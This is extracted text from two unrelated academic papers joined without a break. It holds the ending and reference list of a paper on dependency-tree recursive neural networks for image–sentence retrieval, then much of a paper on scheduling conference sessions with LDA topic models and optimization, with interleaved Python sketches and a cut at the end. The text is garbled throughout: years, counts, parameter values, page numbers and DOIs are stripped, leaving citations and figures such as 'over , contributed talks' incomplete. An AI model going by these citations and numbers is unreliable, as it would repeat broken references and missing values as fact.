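both measures compared above, mean rank and recall at n, can be derived from the same matrix of query-target scores; a sketch with hypothetical names, assuming inner-product scores:

import numpy as np

def ranking_metrics(scores, correct, ns=(1, 5, 10)):
    # scores: (n_queries, n_targets) similarity matrix (higher = more similar)
    # correct: for each query, the index of the single correct target
    order = np.argsort(-scores, axis=1)
    ranks = np.array([np.where(order[q] == correct[q])[0][0] + 1
                      for q in range(scores.shape[0])])
    metrics = {"mean rank": float(ranks.mean())}
    for n in ns:
        # recall at n: fraction of queries whose correct target is among the top n results
        metrics[f"r@{n}"] = float(np.mean(ranks <= n))
    return metrics

rng = np.random.default_rng(2)
scores = rng.normal(size=(20, 50))
correct = rng.integers(0, 50, size=20)
print(ranking_metrics(scores, correct))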
model analysis: semantic composition matrices the best model uses composition matrices based on semantic relationships from the dependency parser. we give some insights into what the model learns by listing the composition matrices with the largest frobenius norms. intuitively, these matrices have learned larger weights that are being multiplied with the child vector in the tree and hence that child will have more weight in the final composed parent vec- tor. in decreasing order of frobenius norm, the re- lationship matrices are: nominal subject, possession modifier (e.g. their), passive auxiliary, preposition at, preposition in front of, passive auxiliary, passive nominal subject, object of preposition, preposition in and preposition on. the model learns that nouns are very important as well as their spatial prepositions and adjectives. conclusion we introduced a new recursive neural network model that is based on dependency trees. for eval- uation, we use the challenging task of mapping sen- tences and images into a common space for finding one from the other. our new model outperforms baselines and other commonly used models that can compute continuous vector representations for sen- tences. in comparison to related models, the dt- rnn is more invariant and robust to surface changes such as word order. references g. andrew, r. arora, k. livescu, and j. bilmes. . deep canonical correlation analysis. in icml, at- lanta, georgia. k. barnard, p. duygulu, n. de freitas, d. forsyth, d. blei, and m. jordan. . matching words and pictures. jmlr. m. baroni and a. lenci. . distributional mem- ory: a general framework for corpus-based semantics. computational linguistics, ( ): – . r. collobert and j. weston. . a unified archi- tecture for natural language processing: deep neural networks with multitask learning. in proceedings of icml, pages – . f. costa, p. frasconi, v. lombardo, and g. soda. . towards incremental parsing of natural language using recursive neural networks. applied intelligence. m. de marneffe, b. maccartney, and c. d. manning. . generating typed dependency parses from phrase structure parses. in lrec. j. dean, g. s. corrado, r. monga, k. chen, m. devin, q. v. le, m. z. mao, m. ranzato, a. senior, p. tucker, k. yang, and a.y. ng. . large scale distributed deep networks. in nips. j. deng, w. dong, r. socher, l.-j. li, k. li, and l. fei- fei. . imagenet: a large-scale hierarchical im- age database. in cvpr. j. duchi, e. hazan, and y. singer. . adaptive sub- gradient methods for online learning and stochastic op- timization. jmlr, , july. p. duygulu, k. barnard, n. de freitas, and d. forsyth. . object recognition as machine translation. in eccv. a. farhadi, m. hejrati, m. a. sadeghi, p. young, c. rashtchian, j. hockenmaier, and d. forsyth. . every picture tells a story: generating sentences from images. in eccv. y. feng and m. lapata. . automatic caption gen- eration for news images. ieee trans. pattern anal. mach. intell., . a. frome, g. corrado, j. shlens, s. bengio, j. dean, m. ranzato, and t. mikolov. . devise: a deep visual-semantic embedding model. in nips. c. goller and a. küchler. . learning task- dependent distributed representations by backpropaga- tion through structure. in proceedings of the interna- tional conference on neural networks. e. grefenstette, g. dinu, y.-z. zhang, m. sadrzadeh, and m. baroni. . multi-step regression learning for compositional distributional semantics. in iwcs. a. gupta and l. s. davis. . 
beyond nouns: exploit- ing prepositions and comparative adjectives for learn- ing visual classifiers. in eccv. m. hodosh, p. young, and j. hockenmaier. . fram- ing image description as a ranking task: data, mod- els and evaluation metrics. j. artif. intell. res. (jair), : – . e. h. huang, r. socher, c. d. manning, and a. y. ng. . improving word representations via global context and multiple word prototypes. in acl. k. jarrett, k. kavukcuoglu, m.a. ranzato, and y. le- cun. . what is the best multi-stage architecture for object recognition? in iccv. p. blunsom. k.m. hermann. . the role of syntax in vector space models of compositional semantics. in acl. a. krizhevsky, i. sutskever, and g. e. hinton. . imagenet classification with deep convolutional neural networks. in nips. g. kulkarni, v. premraj, s. dhar, s. li, y. choi, a. c. berg, and t. l. berg. . baby talk: understanding and generating image descriptions. in cvpr. n. kumar, a. c. berg, p. n. belhumeur, , and s. k. na- yar. . attribute and simile classifiers for face ver- ification. in iccv. p. kuznetsova, v. ordonez, a. c. berg, t. l. berg, and yejin choi. . collective generation of natural image descriptions. in acl. q. v. le, m.a. ranzato, r. monga, m. devin, k. chen, g.s. corrado, j. dean, and a. y. ng. . build- ing high-level features using large scale unsupervised learning. in icml. t. mikolov, w. yih, and g. zweig. . linguistic regularities in continuous spaceword representations. in hlt-naacl. j. mitchell and m. lapata. . composition in dis- tributional models of semantics. cognitive science, ( ): – . j. ngiam, a. khosla, m. kim, j. nam, h. lee, and a.y. ng. . multimodal deep learning. in icml. v. ordonez, g. kulkarni, and t. l. berg. . im text: describing images using million captioned pho- tographs. in nips. j. b. pollack. . recursive distributed representa- tions. artificial intelligence, , november. c. rashtchian, p. young, m. hodosh, and j. hocken- maier. . collecting image annotations using amazon’s mechanical turk. in workshop on creat- ing speech and language data with amazon’s mturk. r. socher and l. fei-fei. . connecting modalities: semi-supervised segmentation and annotation of im- ages using unaligned text corpora. in cvpr. r. socher, c. d. manning, and a. y. ng. . learning continuous phrase representations and syntactic pars- ing with recursive neural networks. in proceedings of the nips- deep learning and unsupervised fea- ture learning workshop. r. socher, e. h. huang, j. pennington, a. y. ng, and c. d. manning. a. dynamic pooling and unfold- ing recursive autoencoders for paraphrase detection. in nips. r. socher, c. lin, a. y. ng, and c.d. manning. b. parsing natural scenes and natural language with recursive neural networks. in icml. r. socher, j. pennington, e. h. huang, a. y. ng, and c. d. manning. c. semi-supervised recursive autoencoders for predicting sentiment distributions. in emnlp. r. socher, b. huval, c. d. manning, and a. y. ng. . semantic compositionality through recursive matrix-vector spaces. in emnlp. r. socher, j. bauer, c. d. manning, and a. y. ng. a. parsing with compositional vector grammars. in acl. r. socher, m. ganjoo, c. d. manning, and a. y. ng. b. zero-shot learning through cross-modal transfer. in nips. r. socher, m. ganjoo, h. sridhar, o. bastani, and a. y. ng. c. d. manning and. c. zero-shot learn- ing through cross-modal transfer. in proceedings of the international conference on learning representa- tions (iclr, workshop track). n. srivastava and r. salakhutdinov. . 
multimodal learning with deep boltzmann machines. in nips. a. torralba, k. p. murphy, and w. t. freeman. . using the forest to see the trees: exploiting context for visual object detection and localization. communica- tions of the acm. p. d. turney and p. pantel. . from frequency to meaning: vector space models of semantics. journal of artificial intelligence research, : – . b. yao, x. yang, l. lin, m. w. lee, and s.-c. zhu. . i t:image parsing to text description. ieee xplore. submitted january accepted october published november corresponding author prashanti manda, p_manda@uncg.edu academic editor christopher mungall additional information and declarations can be found on page doi . /peerj-cs. copyright manda et al. distributed under creative commons cc-by . open access avoiding ‘‘conflicts of interest’’: a computational approach to scheduling parallel conference tracks and its human evaluation prashanti manda , alexander hahn , katherine beekman and todd j. vision department of computer science, university of north carolina at greensboro, greensboro, nc, united states of america department of computer science, university of southern california, los angeles, united states of america roi revolution inc., raleigh, nc, united states of america department of biology, university of north carolina at chapel hill, chapel hill, nc, united states of america abstract conferences with contributed talks grouped into multiple concurrent sessions pose an interesting scheduling problem. from an attendee’s perspective, choosing which talks to visit when there are many concurrent sessions is challenging since an individual may be interested in topics that are discussed in different sessions simultaneously. the frequency of topically similar talks in different concurrent sessions is, in fact, a common cause for complaint in post-conference surveys. here, we introduce a practical solution to the conference scheduling problem by heuristic optimization of an objective function that weighs the occurrence of both topically similar talks in one session and topically different talks in concurrent sessions. rather than clustering talks based on a limited number of preconceived topics, we employ a topic model to allow the topics to naturally emerge from the corpus of contributed talk titles and abstracts. we then measure the topical distance between all pairs of talks. heuristic optimization of preliminary schedules seeks to balance the topical similarity of talks within a session and the dissimilarity between concurrent sessions. using an ecology conference as a test case, we find that stochastic optimization dramatically improves the objective function relative to the schedule manually produced by the program committee. approximate integer linear programming can be used to provide a partially-optimized starting schedule, but the final value of the discrimination ratio (an objective function used to estimate coherence within a session and disparity between concurrent sessions) is surprisingly insensitive to the starting schedule. furthermore, we show that, in contrast to the manual process, arbitrary scheduling constraints are straightforward to include. we applied our method to a second biology conference with over , contributed talks plus scheduling constraints. in a randomized experiment, biologists responded similarly to a machine-optimized schedule and a highly modified schedule produced by domain experts on the conference program committee. 
subjects artificial intelligence, computer education, data mining and machine learning, digital libraries, social computing keywords topic modeling, optimization, conference scheduling how to cite this article manda p, hahn a, beekman k, vision tj. . avoiding ‘‘conflicts of interest’’: a computational approach to scheduling parallel conference tracks and its human evaluation. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:p_manda@uncg.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. figure two steps in the process of manually assigning talks to sessions for the american physi- cal society march meeting. photos courtesy of dr. karen daniels. photo credit to dr. daphne klotsa. full-size doi: . /peerjcs. /fig- introduction researchers and educators depend upon professional conferences to showcase their work and stay current on the work of their peers. thousands of such conferences are held each year worldwide, and conferences that feature of hundreds of oral presentations are not unusual. such large conferences often schedule oral presentations in concurrent sessions so that each presentation can be allocated adequate time while keeping the overall conference duration to only a few days. conference scheduling is typically done manually by program organizers who review the large volume of talk submissions, decide which talks are similar to each other, and group similar talks into sessions accordingly (fig. ). they do this based on the information provided by prospective presenters, which invariably includes a title but may also include keywords, topic categories and/or an abstract. this is a tedious and often error-prone process, done in some cases under considerable time pressure, that is not easily scaled and can lead to sub-optimal conference schedules (hillis, ). since conference attendees typically aim to attend those talks most relevant to their interests, the ideal conference schedule will not only ensure similarity of topics within a session, but also avoid topical conflict among concurrent sessions. in practice, identifying similarity among talks is a highly subjective process. research talks often have several dimensions; a talk presenting an efficient key distribution scheme for asymmetric cryptography is related to key distribution algorithms, network security, and cryptographic algorithms. talk a might be more similar to talk b on one dimension but more similar to talk c on a different dimension. depending on their areas of expertise, different organizers might weight those dimensions differently, and the weights of the organizers may or may not be representative of the conference attendees. even if the measure of similarity were not subjective, ensuring a high level of dissimilarity among concurrent sessions, each with multiple talks, is a challenging task for humans, as it requires perception of the distribution of many points in a highly multidimensional space. this can lead to schedules with conflict between concurrent sessions even when the manda et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. talks within each individual session appear similar. 
ensuring a high level of dissimilarity among concurrent sessions is important to minimize participants having to move between sessions, or having to choose between co-occurring talks of equal interest. vangerven et al. ( ) also note that dissimilarity between concurrent sessions is important for enabling participants to attend the talks of most interest to them without encountering scheduling conflicts, as might happen when talks of a similar topical nature are scheduled in concurrent sessions. adding to the complexity of the conference scheduling task is the fact that organizers typically have to accommodate idiosyncratic scheduling constraints due to the travel schedules and other obligations of individual presenters. efficient and automated data- driven solutions to overcome the problems would be desirable. the conference scheduling problem imagine a conference with q talks scheduled across w days with a maximum of n timeslots per day, each with a maximum of cmax concurrent sessions. a session is defined as a sequence of talks scheduled during one timeslot in one room. the maximum number of talks in a session is predefined by the organizers and does not vary across the schedule. sessions are considered concurrent when they are scheduled in the same timeslot. timeslots are non-overlapping. we define the conference scheduling problem as the task of assigning talks to timeslots and concurrent sessions so as to maximize coherence within a session and minimize similarity between concurrent sessions (i.e., those within the same timeslot). in this work, we describe a heuristic solution to the conference scheduling problem that creates optimized conference schedules with multiple concurrent sessions in a fully automated fashion. first, we propose the use of a data-driven machine-learning approach, topic modeling (wallach, ), to infer similarity between talks. we use topic modeling to identify a set of latent topics relevant to the full set of talks being presented at a conference. each talk can then be represented as a weighted vector of these different topics, and we can compare these vectors as a measure of similarity. thus, topic modeling provides a principled way to decide upon which dimensions to consider, and how to weigh those dimensions, in measuring similarity (between talks, between sessions, or between talks and sessions). second, we present a suite of heuristic schedule creation approaches designed to maximize an objective function that quantifies session coherence and dissimilarity between concurrent sessions in a single metric. we explore different strategies to create initial schedules, including a greedy heuristic, random assignment, and integer linear programming. we then explore different stochastic optimization strategies to further improve upon the initial schedules (spall, ), and investigate how the optimality of the initial schedule impacts the final result. we selected a high-performing combination of approaches that improved upon a manually produced schedule for a recently held ecology conference. using this combination of approaches, we then created an automated schedule for a large evolutionary biology conference that had not yet been held, in collaboration with the conference organizing manda et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. committee. the organizing committee made major, manual modifications to produce the final schedule that was used. 
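one concrete way to represent the scheduling objects just defined (timeslots, concurrent sessions, talks) is as nested containers; the sketch below is a minimal illustration under assumed names, since the paper does not prescribe a particular data structure.

from dataclasses import dataclass, field
from typing import List

@dataclass
class Session:
    talks: List[int] = field(default_factory=list)          # indices into the list of q talks

@dataclass
class Timeslot:
    sessions: List[Session] = field(default_factory=list)   # up to c_max concurrent sessions

@dataclass
class Schedule:
    days: int                                                # w days
    timeslots: List[Timeslot] = field(default_factory=list)  # n timeslots in total

    def all_sessions(self):
        for slot in self.timeslots:
            for session in slot.sessions:
                yield session

# illustrative instance: 2 timeslots, 3 concurrent sessions each, 4 talks per session
schedule = Schedule(days=1, timeslots=[
    Timeslot(sessions=[Session(talks=list(range(s * 4, s * 4 + 4))) for s in range(3)]),
    Timeslot(sessions=[Session(talks=list(range(12 + s * 4, 16 + s * 4))) for s in range(3)]),
])
print(sum(len(s.talks) for s in schedule.all_sessions()))    # 24 talks scheduled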
after the evolutionary biology conference was held, we conducted an experiment where biologists with expertise in that field were presented with samples of the concurrent sessions from both the machine-generated and manually-modified schedules in order to elicit their subjective opinions about session coherence and conflict among concurrent sessions. this provided an evaluation of how well the discrimination ratio captured the topic dimensions that mattered to experts in the field who would be representative of conference attendees. related work surprisingly, given the pervasive exposure of academics to the challenges of conference scheduling, there is a relatively small literature on the problem (reviewed in vangerven et al. ( )). bhardwaj et al. ( ) and andré et al. ( ) incorporate attendee preferences for talk and session placement in a community-informed conference scheduling approach (sampson, ; kim et al., ; chilton et al., ). in sampson ( ), conference attendees submit time preferences for their talk. the scheduling algorithm, a modification of the simulated annealing heuristic, then attempts to accommodate participant preferences using the number of preferences accommodated as the objective function. similarly, kim et al. ( ) and chilton et al. ( ) use community sourced preferences for talk and session placement to guide the scheduling process. conference attendees are asked to submit their preferences as to which talks should be scheduled with their own talk and which talks belonged in similarly themed sessions that should not be scheduled concurrently to one another. these preferences are encoded into a scheduling interface that is then used by organizers to create and schedule sessions with the aim of maximizing the number of preferences accommodated while resolving author, talk, and session conflicts. in contrast to our approach, the actual scheduling process is manual. edis & edis ( ) approach the scheduling problem using an integer programming (ip) formulation in which each talk is assigned a topic and talks are assigned to a session so that all talks in the session have the same topic. houlding & haslett ( ) describe a clustering algorithm to group similar talks into fixed size clusters (or sessions), using a local objective function that maximizes the similarity of talk pairs assigned to a cluster at each step. to measure similarity between talks, participants are asked to select three relevant sessions for their talk. the co-occurrence frequency of session topics is then used to determine similarity between talks and sessions. gulati & sengupta ( ) use an augmented objective function that incorporates a prediction of a talk’s popularity based on reviewer comments and participant preferences of time slots. the goal of the schedule is to maximize session attendance. the work uses a greedy scheduling algorithm, but no empirical results or computational analysis are presented. ibrahim, ramli & hassan ( ) focus on assigning talks to time slots across a number of days in concurrent sessions. each talk belongs to a field or topic and the goal is avoid scheduling talks of the same topic concurrently. the study presents methods based on combinatorial design theory for three conferences used as case-studies. the study does not address how talks are grouped into sessions. quesnelle & steffy ( ) consider an optimization problem that assigns talks to manda et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. 
timeslots and rooms such that scheduling conflicts are minimized while accounting for presenter and room availabilities. potthoff & munger ( ) apply integer programming to assign sessions to time periods in a way that sessions for each subject area are spread evenly across time slots. similarly, nicholls ( ) assign sessions to rooms and time periods to avoid presenters being scheduled in two concurrent sessions while trying to maximize presenter preferences in the schedule. both of the above assume that the clustering of similar talks into sessions has already been accomplished. nicholls ( ) and eglese & rand ( ) aim to optimize participant satisfaction by collecting participant preferred sessions. in eglese & rand ( ), a simulated annealing algorithm assigns sessions to time periods with the aim of minimizing the sum of the weighted violations of session preferences. le page ( ) requires participants to provide the number of sessions they would like to attend. they build a conflict matrix containing the number of people that wish to attend both session i and j. the goal is to assign sessions to timeslots such that the sum of conflicts between simultaneous sessions is minimized. sessions with the same topic must be assigned to the same room. the authors propose a semi-automated heuristic consisting of four steps that was used to schedule a meeting of the american crystallographic association. among the few studies to address the problem of grouping similar talks into sessions were tanaka, mori & bargiela ( ) and tanaka & mori ( ). they use a set of user assigned keywords for each talk and use an objective function that is a nonlinear utility function of common keywords. the intuition behind the approach is that papers in the same session have as much overlap in keywords as possible. they use kohonen’s self organizing maps (tanaka, mori & bargiela, ) and a hybrid grouping genetic algorithm (tanaka & mori, ). vangerven et al. ( ) present a method that approaches the conference scheduling problem in three phases. the first phase aims to maximize total attendance, based on the participants’ preferences. the second phase tries to minimize the total number of session hops or minimizing the amount of topical overlap between concurrent sessions. the third phase aims to accommodate presenter preferences and availabilities by minimizing the total number of preferences violated. stidsen, pisinger & vigo ( ) approach conference scheduling using a number of optimization models each with a specific objective. research fields are assigned to buildings with the aim of assigning related areas to buildings physically close to each other. each session is assigned to one room. finally, the solution optimizes assignment of sessions to room sizes. despite these research contributions, the practice of manual scheduling is still widespread, and not all factors that would allow for a practical automated solution have been considered by researchers. compared to previous work, our approach is novel in its use of topic modeling to measure talk similarity in multiple dimensions, stochastic optimization of a global objective function that ensures both similarity within a session and disparity between concurrent sessions, and the lack of a need for human intervention. manda et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. methods we first provide a description of the different parameters and variables (‘preliminaries’) used through ‘methods’. 
then, we present details about creating the corpus of documents for topic modeling along with the topic modeling algorithms used ('creating the corpus for topic modeling' and 'topic modeling'). next, we describe how similarity between talks and sessions is computed using outputs from the topic model ('computing similarity between talks and sessions'). an objective function called the discrimination ratio, which quantifies the similarity of talks within a session vs. the disparity between concurrent sessions, is then presented ('an objective function for conference scheduling'). finally, we outline heuristic approaches for creating initial schedules ('creation of initial schedules') and for optimizing the initial schedules ('stochastic optimization').

preliminaries
a conference schedule is composed of w days, each with n timeslots, with a total of q talks. each timeslot is further divided into a maximum of cmax concurrent sessions. two sessions are considered to be concurrent if the starting and ending time of the sessions are the same. the number of concurrent sessions in any given timeslot i is represented by ci. each session can contain a maximum of tmax talks. a session is a sequence of talks scheduled during one timeslot in one room. for a given session j, the number of talks in the session is represented by tj. talks in a particular timeslot and a particular session can be referred to in the order in which they are scheduled: ti,j,k represents the kth talk in session j of timeslot i.

the topic modeling algorithm takes as input the number of topics (g) to be generated from the corpus of q talks. the algorithm outputs a vector representation ($\vec{v}_i$) of each talk as a weighted vector over the g topics. the vector contains the probabilistic relevance of each topic to a talk; for example, $v_{i,1}$ is the probabilistic relevance of topic 1 to talk ti (the ith talk in a session). a pairwise similarity matrix (m) is computed from the above vector representation that contains the cosine similarity (s) between the vectors ($\vec{v}_1$, $\vec{v}_2$) of every pair of talks in the corpus. the cosine similarity, s, of two vectors has a minimum of −1 and a maximum of 1. an objective function, the discrimination ratio (d), is defined as the ratio of the mean talk similarity within a session (sw) to the mean talk similarity between concurrent sessions (sb) across the full schedule.

initial schedules can be created using the random, greedy, or ilp approaches ('creation of initial schedules'). these approaches take the number of days in the conference (w), the number of timeslots per day (n), the maximum number of concurrent sessions in a timeslot (cmax), the maximum number of talks in each concurrent session (tmax), and the pairwise talk similarity matrix (m). we present two variants each of a hill climbing (hc) and a simulated annealing (sa) algorithm that further optimize the initial schedules. for the hc and sa approaches, we experiment with a version (hca, saa) that optimizes the objective function directly and another (hcb, sab) that splits the optimization into two stages, first maximizing within-session similarity and then minimizing between-session similarity. all four variants (hca, hcb, saa, sab) take a starting schedule (i), the number of parallel optimization runs (r), the maximum number of swaps (e), and a pairwise talk similarity matrix (m). the approaches can optionally take a list of scheduling constraints encoded as a dictionary (l). in addition, the sa versions (saa, sab) take an initial temperature (z) and a constant (α = . ). these parameters are further defined in 'simulated annealing'. for ease of reference, the parameters and variables are listed in table .

table : parameters and variables used in the topic modeling, schedule creation, and optimization approaches.
i: input starting schedule created using the random, greedy, or integer linear programming (ilp) approaches
d: discrimination ratio
n: number of timeslots in a schedule
ni: timeslot i
cmax: maximum number of concurrent sessions in a timeslot
c: number of concurrent sessions
ci: number of concurrent sessions in timeslot i
tmax: maximum number of talks in a session
t: number of talks
tj: number of talks in session j
q: number of talks in a schedule
ti,j,k: kth talk in session j of timeslot i
s(v1, v2): cosine similarity between the vector representations of two talks
sw: mean intra-session similarity of a schedule
sb: mean inter-session similarity of a schedule
m: pairwise talk similarity matrix
y: number of seed talks for the greedy algorithm
x: number of clusters created by the kruskal's algorithm
xi: ith kruskal's cluster
txi: number of talks in cluster xi
axi: attractor talk for cluster i
z: initial temperature
zi: temperature at the ith swap; z = ,
α: constant set to .
r: number of parallel optimization runs for an optimization algorithm
e: maximum number of swaps for an optimization algorithm
w: number of days in a conference
l: dictionary of scheduling constraints
g: number of topics in the topic model
vi,j: probabilistic relevance of topic j to talk ti

creating the corpus for topic modeling
the corpus of documents that is input to the topic model is the set of talks for a conference. in our implementation, each document included the title and abstract for a single talk. to ensure that the corpus only contained meaningful words that reflect the semantic content of talks, stemming and stop word removal were applied. stemming reduces variants of words to their base or root form (lovins, ; porter, ; porter, ), making it easier for the topic modeling algorithm to recognize words with the same meaning. stop words are commonly used words (such as 'and', 'it', and 'the') that have little value with respect to the meaning of the text (fox, ). python's natural language toolkit (nltk, https://www.nltk.org) provides a set of commonly used english words that was used as the initial stop word list. for the second conference, evolution , domain experts on the conference organizing committee added additional stop words, leading to a total of stop words.

topic modeling
we used latent dirichlet allocation (lda), a generative probabilistic model often used to describe collections of text corpora and one of the most widely used topic modeling algorithms (blei, ng & jordan, ). lda models each document as a finite mixture over an underlying set of latent topics, and each latent topic as a probabilistic mixture over relevant words. the model assumes dirichlet priors over the latent topics in a document and over the relevant words within a topic. one of the input parameters to the lda algorithm is the number of topics to identify from the corpus. several preliminary topic models were created using different numbers of topics.
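a sketch of the corpus preparation and lda fitting steps described above, using nltk for stemming and stop-word removal and scikit-learn's lda implementation; the number of topics, the placeholder documents, and the vectorizer settings are illustrative assumptions, not the values used in the paper.

import nltk
from nltk.corpus import stopwords
from nltk.stem import PorterStemmer
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.decomposition import LatentDirichletAllocation

nltk.download("stopwords", quiet=True)
stemmer = PorterStemmer()
stop_words = set(stopwords.words("english"))      # initial nltk stop word list

def preprocess(document):
    # one document = the title plus abstract of a single talk
    tokens = [t.lower().strip(".,;:()") for t in document.split()]
    return " ".join(stemmer.stem(t) for t in tokens if t.isalpha() and t not in stop_words)

talks = [
    "Phylogenetic signal in floral trait evolution ...",          # placeholder title + abstract
    "Bayesian estimation of divergence times from fossils ...",
]
corpus = [preprocess(d) for d in talks]

counts = CountVectorizer().fit_transform(corpus)
lda = LatentDirichletAllocation(n_components=20, random_state=0)  # g = 20 topics, illustrative
talk_topic_vectors = lda.fit_transform(counts)    # one weighted topic vector per talk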
we developed a metric, the match percentage, to compare the fit of different models. for each model, the top two words from each of the top three topics of a talk were used to create a set of six keywords. the fraction of keywords found within the title and abstract was computed for each talk, and the match percentage was computed as the mean of this fraction across all talks, expressed as a percentage. the topic model with the highest match percentage was chosen for subsequent analyses. while there are automated metrics, such as perplexity (blei & lafferty, ), to evaluate topic models, studies that have tested these metrics have reported that inferences based on them were negatively correlated with human perception (chang et al., ; chang & blei, ). these studies also suggest that topic models should be chosen by human analysis of the coherence of the topics inferred by a model, the words within topics, etc., instead of trying to optimize likelihood-based measures (chang & blei, ).

computing similarity between talks and sessions
lda outputs a representation of each talk in the corpus as a weighted vector over all the latent topics. in a model with g topics, the vector $\vec{v}_i$ of talk $t_i$ is defined as

$\vec{v}_i = (v_{i,1}, v_{i,2}, \ldots, v_{i,g})$ ( )

where i is the talk number and $v_{i,1}$ is the probabilistic relevance of topic 1 to talk $t_i$. from this, a pairwise similarity matrix, m, is computed by calculating the cosine similarity (s) of the two vectors, $\vec{v}_1$ and $\vec{v}_2$, for every pair of talks in the corpus:

$s(\vec{v}_1, \vec{v}_2) = \dfrac{\sum_{j=1}^{g} v_{1,j}\, v_{2,j}}{\sqrt{\sum_{j=1}^{g} (v_{1,j})^2}\, \sqrt{\sum_{j=1}^{g} (v_{2,j})^2}}$. ( )

an objective function for conference scheduling
we introduce an objective function called the discrimination ratio, d, to quantify in one measure the similarity of talks within each session and the disparity between talks in concurrent sessions. d is defined as the ratio of the mean within-session similarity to the mean between-session similarity across the full schedule. d is higher (> 1) when the mean within-session similarity is higher than the mean between-session similarity in a schedule. lower d values (< 1) indicate that the mean within-session similarity is lower than the mean between-session similarity. d is 1 when the mean within-session similarity is the same as the mean between-session similarity.

the mean within-session similarity, $s_w$, is the mean of the pairwise similarities between all the talks within each session:

$s_w = \dfrac{\sum_{i=1}^{n}\sum_{j=1}^{c_i}\sum_{k=1}^{t_j-1}\sum_{l=k+1}^{t_j} s(t_{i,j,k},\, t_{i,j,l})}{\sum_{i=1}^{n}\sum_{j=1}^{c_i}\binom{t_j}{2}}$ ( )

where n is the number of timeslots in the schedule, $c_i$ is the number of concurrent sessions in timeslot i, $t_j$ is the number of talks in session j, and $s(t_{i,j,k}, t_{i,j,l})$ (from eq. ( )) is the cosine similarity between talk k in timeslot i, session j and talk l in timeslot i, session j.

the mean between-session similarity, $s_b$, is the mean of the pairwise similarities between all the talks in different concurrent sessions:

$s_b = \dfrac{\sum_{i=1}^{n}\sum_{j=1}^{c_i}\sum_{k=1}^{t_j}\sum_{l=j+1}^{c_i}\sum_{m=1}^{t_l} s(t_{i,j,k},\, t_{i,l,m})}{\sum_{i=1}^{n}\sum_{j=1}^{c_i}\sum_{k=1}^{t_j}\sum_{l=j+1}^{c_i}\sum_{m=1}^{t_l} 1}$ ( )

the discrimination ratio is defined as $d = s_w / s_b$. d is inspired by other commonly used metrics used to evaluate the quality of clusters generated by clustering algorithms, such as k-means.
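a sketch of how the similarity matrix and the discrimination ratio defined above could be computed; the schedule is assumed to be a nested list of timeslots, each a list of sessions, each a list of talk indices (names and structure are illustrative, not taken from the authors' code):

import numpy as np
from itertools import combinations
from sklearn.metrics.pairwise import cosine_similarity

def discrimination_ratio(schedule, talk_topic_vectors):
    # m[a, b] = cosine similarity between the topic vectors of talks a and b (eq. 2)
    m = cosine_similarity(talk_topic_vectors)

    within_sum = within_pairs = 0.0
    between_sum = between_pairs = 0.0
    for timeslot in schedule:                          # schedule: [[session, ...], ...]
        # pairs of talks within the same session (numerator and denominator of s_w)
        for session in timeslot:
            for a, b in combinations(session, 2):
                within_sum += m[a, b]
                within_pairs += 1
        # pairs of talks in different concurrent sessions of the same timeslot (s_b)
        for s1, s2 in combinations(timeslot, 2):
            for a in s1:
                for b in s2:
                    between_sum += m[a, b]
                    between_pairs += 1
    s_w = within_sum / within_pairs
    s_b = between_sum / between_pairs
    return s_w / s_b                                   # d = s_w / s_b

# illustrative usage with random topic vectors for 24 talks in 2 timeslots of 3 sessions
vectors = np.random.default_rng(3).dirichlet(np.ones(20), size=24)
toy_schedule = [[[0, 1, 2, 3], [4, 5, 6, 7], [8, 9, 10, 11]],
                [[12, 13, 14, 15], [16, 17, 18, 19], [20, 21, 22, 23]]]
print(round(discrimination_ratio(toy_schedule, vectors), 3))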
such commonly used metrics include the error sum of squares (sse)—the sum of the squared differences between each observation and its cluster’s mean (celebi, kingravi & vela, ), intercluster distance (gonzalez, )—the sum of the squared distances between each cluster’s centroid, or intracluster distance—the sum of the squared distances between an item and its cluster’s centroid. creation of initial schedules we consider three approaches for the creation of initial schedules: random, greedy, and integer linear programming (ilp). manda et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. random the random assignment algorithm provides a baseline against which to compare the performance of approaches that explicitly optimize the objective function. given a set of talks and scheduling parameters as in ‘preliminaries’, this algorithm assigns talks to sessions through sampling with replacement with no consideration of talk similarities or the value of the objective function. greedy the greedy assignment algorithm generates a semi-optimal schedule for further stochastic optimization. in addition to the parameters in ‘preliminaries’, the algorithm requires a set of y seed talks that are selected based on an input threshold of minimum dissimilarity between each other. first, the algorithm finds a session for each seed talk such as to maximize the objective function. next, the rest of the talks are assigned to sessions by choosing the most locally optimal solution at each step. integer linear programming we cast the problem of scheduling the conference as an integer linear program (ilp) using a variable reduction technique that was solved using ampl (gay & kernighan, ) with the cplex solver (http://www.cplex.com). an integer linear program (ilp) consists of variables, constraints, and an objective function where some or all of the variables take on integer values (bosch & trick, ). non-integer variables have numeric values that are limited to a feasible region by the constraints. the objective function determines the assignment of values to the variables that results in an optimal solution. both the constraints and the objective function must be linear in the variables. in our implementation, a heuristic pre-processing step first groups the talks into x clusters of similar talks using a modified version of kruskal’s algorithm (kruskal, ), a greedy algorithm that is used to find a minimum spanning tree from a weighted graph of nodes. in this work, nodes represent talks while edge weights represent pairwise talk similarity. we use a modification of kruskal’s algorithm to find a number of disjoint maximum-weight spanning trees from the graph. each disjoint spanning tree is a cluster that groups similar talks while the spanning trees are sufficiently distant from each other. at the beginning of the algorithm, each talk forms its own cluster. at each iteration of the algorithm, the pair of talks with the highest edge weight (similarity score) is selected. if the two talks are in separate clusters, the clusters are merged to form a bigger cluster. the algorithm is terminated as soon as x disjoint and distant clusters of similar talks are created. a representative talk called the attractor (axi), is then chosen from each of the x clusters. the aim is to produce a set of initial input talks for the ilp that are highly different from each other, while ensuring that each attractor has many other talks similar to it. 
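a sketch of this clustering step: repeatedly merge the two clusters joined by the most similar remaining talk pair until only x clusters are left, expressed as a union-find procedure; the function and variable names are illustrative, not the authors' implementation.

import numpy as np

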